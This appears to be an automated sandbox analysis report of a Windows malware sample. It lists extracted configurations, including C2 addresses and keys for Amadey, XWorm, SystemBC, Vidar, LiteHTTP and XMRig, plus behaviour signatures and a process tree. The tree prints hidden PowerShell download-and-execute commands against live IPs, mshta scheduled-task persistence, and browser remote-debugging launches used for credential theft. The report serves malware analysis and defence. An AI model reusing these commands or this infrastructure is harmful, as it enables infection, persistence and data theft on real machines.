Analysis

  • max time kernel
    138s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/03/2025, 22:58

General

  • Target

    f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe

  • Size

    1.8MB

  • MD5

    457a48e9c0a205ea619dd5d5b4c2a6c3

  • SHA1

    15b8560577817747c13dc391d973ad2e26901315

  • SHA256

    f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e

  • SHA512

    ce53209091c4e22937bf82bd55e219347d4d3a5c339db8b5605ee4753edc2dbe292c40a3da7d736908c27f5c99636fd3c06ab4c81254366d89801cf3d9037e5a

  • SSDEEP

    49152:9p5faVoBzpIR5RtIfI9oljVRy3FgX1KL4Bc:T5goVpIRTtIA9AjhX1q4B

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

45.154.98.175:6969

Mutex

uGmGtmYAbzOi1F41

Attributes
  • Install_directory

    %AppData%

  • install_file

    google_updates.exe

aes.plain

Extracted

Family

systembc

C2

towerbingobongoboom.com

62.60.226.86

Attributes
  • dns

    5.132.191.104

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xmrig family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
  • XMRig Miner payload 15 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 20 IoCs
  • Uses browser remote debugging 2 TTPs 15 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 34 IoCs
  • Identifies Wine through registry keys 2 TTPs 14 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 46 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 36 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 13 IoCs
  • Modifies registry class 12 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 18 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of UnmapMainImage
    PID:3384
    • C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe
      "C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:116
      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Downloads MZ/PE file
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4896
        • C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
          "C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1728
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D64B.tmp\D64C.tmp\D64D.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1844
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3108
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops startup file
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3544
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\31xayw5v\31xayw5v.cmdline"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4688
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES981.tmp" "c:\Users\Admin\AppData\Local\Temp\31xayw5v\CSC124C6D5AD9C742CBB436A684BDC2DF.TMP"
                    9⤵
                      PID:1596
          • C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
            "C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:1836
            • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
              "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
              5⤵
              • Downloads MZ/PE file
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1988
              • C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
                "C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2248
          • C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
            "C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"
            4⤵
            • Drops startup file
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:1860
          • C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe
            "C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:4292
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c schtasks /create /tn RDgJamaaXU3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\e90hfFDx3.hta" /sc minute /mo 25 /ru "Admin" /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2704
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn RDgJamaaXU3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\e90hfFDx3.hta" /sc minute /mo 25 /ru "Admin" /f
                6⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:4500
            • C:\Windows\SysWOW64\mshta.exe
              mshta C:\Users\Admin\AppData\Local\Temp\e90hfFDx3.hta
              5⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3856
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1844
                • C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE
                  "C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3548
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1204
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 2
              5⤵
              • System Location Discovery: System Language Discovery
              • Delays execution with timeout.exe
              PID:692
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2052
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3876
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:8
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4316
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1372
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2304
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn "cdohBmas9nm" /tr "mshta \"C:\Temp\ScsxbnLrP.hta\"" /sc minute /mo 25 /ru "Admin" /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:4756
            • C:\Windows\SysWOW64\mshta.exe
              mshta "C:\Temp\ScsxbnLrP.hta"
              5⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              PID:2356
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4252
                • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2700
          • C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe
            "C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2916
          • C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe
            "C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1368
          • C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe
            "C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4236
          • C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe
            "C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:4248
          • C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
            "C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe"
            4⤵
            • Executes dropped EXE
            PID:1604
            • C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe
              C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:4624
          • C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
            "C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:3932
            • C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
              "C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              PID:4584
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                6⤵
                • Uses browser remote debugging
                • Enumerates system info in registry
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of FindShellTrayWindow
                PID:5272
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb2373cc40,0x7ffb2373cc4c,0x7ffb2373cc58
                  7⤵
                    PID:5296
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1904 /prefetch:2
                    7⤵
                      PID:5484
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2148 /prefetch:3
                      7⤵
                        PID:5500
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2248 /prefetch:8
                        7⤵
                          PID:5528
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3128 /prefetch:1
                          7⤵
                          • Uses browser remote debugging
                          PID:5760
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3260 /prefetch:1
                          7⤵
                          • Uses browser remote debugging
                          PID:5768
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4456,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4508 /prefetch:1
                          7⤵
                          • Uses browser remote debugging
                          PID:5984
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4632 /prefetch:8
                          7⤵
                            PID:6020
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4636,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4832 /prefetch:8
                            7⤵
                              PID:6028
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4972,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5008 /prefetch:8
                              7⤵
                                PID:5148
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                              6⤵
                              • Uses browser remote debugging
                              • Enumerates system info in registry
                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                              • Suspicious use of FindShellTrayWindow
                              PID:6004
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ffb22f346f8,0x7ffb22f34708,0x7ffb22f34718
                                7⤵
                                • Checks processor information in registry
                                • Enumerates system info in registry
                                PID:3152
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
                                7⤵
                                  PID:5164
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
                                  7⤵
                                    PID:5152
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
                                    7⤵
                                      PID:5256
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
                                      7⤵
                                      • Uses browser remote debugging
                                      PID:5624
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
                                      7⤵
                                      • Uses browser remote debugging
                                      PID:5640
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1
                                      7⤵
                                      • Uses browser remote debugging
